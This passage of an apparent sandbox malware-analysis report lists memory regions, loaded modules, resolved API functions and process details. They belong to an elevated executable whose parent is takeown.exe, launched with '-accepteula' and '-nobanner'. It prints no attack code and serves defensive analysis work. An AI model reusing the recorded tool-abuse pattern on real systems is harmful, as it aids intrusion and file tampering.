| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x75160000 | 0x7521dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x753b0000 | 0x753f3fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75430000 | 0x767eefff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x76810000 | 0x7681efff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x77290000 | 0x772d3fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77340000 | 0x773ccfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x773f0000 | 0x778ccfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x77c30000 | 0x77c3bfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd5000 | 0x7ffd5000 | 0x7ffd7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ff8ee37ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x75260000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x76a10000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x75160000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x77000000 |
|
1 | |
| Load | USER32.dll | base_address = 0x77150000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x748e0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x752860c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x75286110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x752787e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x75285f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x75284a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x75285fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x7527a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x7527c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x75286300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x75279a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x752861b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x7527fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77cf4f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x75279a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x752779b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x7527fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x752792b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x7527a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75286180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x75283a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x75278cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75285f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75272af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x752778f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75272db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75272da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x75277a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x7527a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x75279660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x7527a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x7527a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x752787c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x75278840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75277940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75279560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x752869c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x75286390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x752a1c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x752868e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x75286920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x75286540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x77ce5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x77ce5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x752a26a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x77cdda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x77cff190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x77cfa200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x752874f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x75279fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x75272d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x752775a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x752725e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x75286870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x752868c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x75286900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x75279700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75271b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77d02570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x75277920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77cf9920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x752862a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75286590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x75286860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75279680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x752864a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x7527a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x752a28e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x7527a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75286020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x752777b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x7527fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x75279a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x75271ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x75271da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x75279930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x7527a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x75278770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x7527fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75279fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75277910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x75279a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75272dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75271d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x75272b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x7527a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x7527a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x77cdbae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x752864f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x76a2ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x76a2fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x76a295e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x76a30680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x76a2ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x76a2f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x76a2ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x76a2ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x76a2f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x76a306c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x76a2efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x76a2f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x7516c6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x770aee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x770855a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x770857e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x77089590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x77080820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x770afbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x771638f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x7717b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x7717b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x77167740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x771774e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x7717efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x77184ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x77174580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x77171540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x748e1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x748e1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x748e1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x7527a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x7527f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75277580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75279910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75286030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x75285f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x75285ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7527a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7527a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x77cd40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x77ccd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x77ccecf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x75285720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x77cce140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x77cceb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77d09990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77d05540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77cf9dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7527a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x752a0a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x74fa0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7527f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x7527fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x752a1030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7527a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x752a14b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7527a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x752a16f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x75279970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x74f23c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x75278710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x752796e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-11-09 19:48:27 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #199: g13k6qzj.exe
175
0
| Information | Value |
|---|---|
| ID | #199 |
| File Name | c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe |
| Command Line | G13k6QZj.exe -accepteula "Shorthand.jtp" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:16, Reason: Child Process |
| Unmonitor | End Time: 00:03:19, Reason: Self Terminated |
| Monitor Duration | 00:00:03 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xcec |
| Parent PID | 0x854 (c:\windows\syswow64\takeown.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
BEC
0x
708
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x0034ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x0020ffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x00210000 | 0x00239fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x00210fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000250000 | 0x00250000 | 0x0034ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000350000 | 0x00350000 | 0x0035ffff | Private Memory | rw |
|
|
|
- |
| g13k6qzj.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| locale.nls | 0x00480000 | 0x0053dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000540000 | 0x00540000 | 0x0063ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000640000 | 0x00640000 | 0x007bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000007c0000 | 0x007c0000 | 0x00947fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000950000 | 0x00950000 | 0x00ad0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000ae0000 | 0x00ae0000 | 0x01edffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001ee0000 | 0x01ee0000 | 0x0207ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74800000 | 0x74891fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x748e0000 | 0x748e7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x75160000 | 0x7521dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x753b0000 | 0x753f3fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75430000 | 0x767eefff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x76810000 | 0x7681efff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x77290000 | 0x772d3fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77340000 | 0x773ccfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x773f0000 | 0x778ccfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x77c30000 | 0x77c3bfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
